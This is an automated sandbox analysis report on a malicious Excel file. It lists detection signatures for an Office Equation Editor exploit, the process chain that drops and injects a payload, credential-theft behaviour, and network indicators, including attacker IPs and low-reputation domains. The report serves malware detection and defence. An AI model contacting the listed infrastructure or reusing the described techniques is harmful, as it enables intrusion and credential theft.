Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IND24072113_1.xlsx

Overview

General Information

Sample name:IND24072113_1.xlsx
Analysis ID:1538472
MD5:581ec6d09547a4d7f6486848b5b0d550
SHA1:b8132494881408956e1a98813b3083bf0f694c40
SHA256:3576c7491652236210183f0b6620586017fec98ca0d2628abd1aaa4c26791f56
Tags:xlsxuser-TeamDreier
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Contains functionality to detect sleep reduction / modifications
Document exploit detected (process start blacklist hit)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3504 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3656 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • word.exe (PID: 3812 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 2F7343C9A832A66E138737450432D3AC)
        • svchost.exe (PID: 3836 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
          • XAgFxCrXhYKjE.exe (PID: 1580 cmdline: "C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • msinfo32.exe (PID: 3900 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5F2122888583347C9B81724CF169EFC6)
              • XAgFxCrXhYKjE.exe (PID: 1596 cmdline: "C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 3100 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bb:$s1: <legacyDrawing r:id="
  • 0x1e3:$s2: <oleObject progId="
  • 0x226:$s3: autoLoad="true"

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.255.145, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3656, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3656, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3656, Protocol: tcp, SourceIp: 192.3.255.145, SourceIsIpv6: false, SourcePort: 80
Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\word.exe, NewProcessName: C:\Users\user\AppData\Roaming\word.exe, OriginalFileName: C:\Users\user\AppData\Roaming\word.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3656, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3812, ProcessName: word.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\word.exe, NewProcessName: C:\Users\user\AppData\Roaming\word.exe, OriginalFileName: C:\Users\user\AppData\Roaming\word.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3656, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3812, ProcessName: word.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\word.exe, ParentImage: C:\Users\user\AppData\Roaming\word.exe, ParentProcessId: 3812, ParentProcessName: word.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3836, ProcessName: svchost.exe
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3656, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\word.exe, ParentImage: C:\Users\user\AppData\Roaming\word.exe, ParentProcessId: 3812, ParentProcessName: word.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3836, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: IND24072113_1.xlsxAvira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exeReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\word.exeReversingLabs: Detection: 31%
Source: IND24072113_1.xlsxVirustotal: Detection: 53%Perma Link
Source: IND24072113_1.xlsxReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\word.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exeJoe Sandbox ML: detected

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.255.145 Port: 80Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.255.145 Port: 443Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.3.255.145:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: Binary string: msinfo32.pdb source: svchost.exe, 00000006.00000003.529880228.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000002.670713635.00000000003FB000.00000004.00000001.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000003.523531123.00000000003D5000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msinfo32.pdb@ source: svchost.exe, 00000006.00000003.529880228.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000002.670713635.00000000003FB000.00000004.00000001.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000003.523531123.00000000003D5000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XAgFxCrXhYKjE.exe, 00000007.00000000.520856687.00000000008CE000.00000002.00000001.01000000.00000005.sdmp, XAgFxCrXhYKjE.exe, 0000000A.00000002.670905465.00000000008CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdb source: word.exe, 00000005.00000003.465086662.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, word.exe, 00000005.00000003.464337661.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.536511080.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.536511080.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.518776384.0000000000230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.519099529.0000000000460000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.671151712.0000000002190000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.537338754.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.537635285.0000000001E80000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.671151712.0000000002010000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: msinfo32.exe, 00000008.00000002.671662614.00000000028BC000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000008.00000002.670668972.0000000000246000.00000004.00000020.00020000.00000000.sdmp, XAgFxCrXhYKjE.exe, 0000000A.00000000.550091041.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.596824366.00000000015FC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452126
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,5_2_0045C999
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,5_2_00436ADE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00434BEE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,5_2_00436D2D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442E1F
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045DD7C FindFirstFileW,FindClose,5_2_0045DD7C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD29
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00475FE5
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8D

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036AE55A LoadLibraryW,URLDownloadToFileW,2_2_036AE55A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036AE64C ExitProcess,2_2_036AE64C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036AE62C WinExec,ExitProcess,2_2_036AE62C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036AE5E1 URLDownloadToFileW,2_2_036AE5E1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036AE582 URLDownloadToFileW,2_2_036AE582
Source: global trafficDNS query: name: timurtrading.my
Source: global trafficDNS query: name: www.omnibizlux.biz
Source: global trafficDNS query: name: www.sqlite.org
Source: global trafficDNS query: name: www.75e296qdx.top
Source: global trafficDNS query: name: www.myprefpal.xyz
Source: global trafficDNS query: name: www.jilifish.win
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 167.172.133.32:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 45.33.6.223:80
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 185.196.10.234:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 15.197.148.33:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
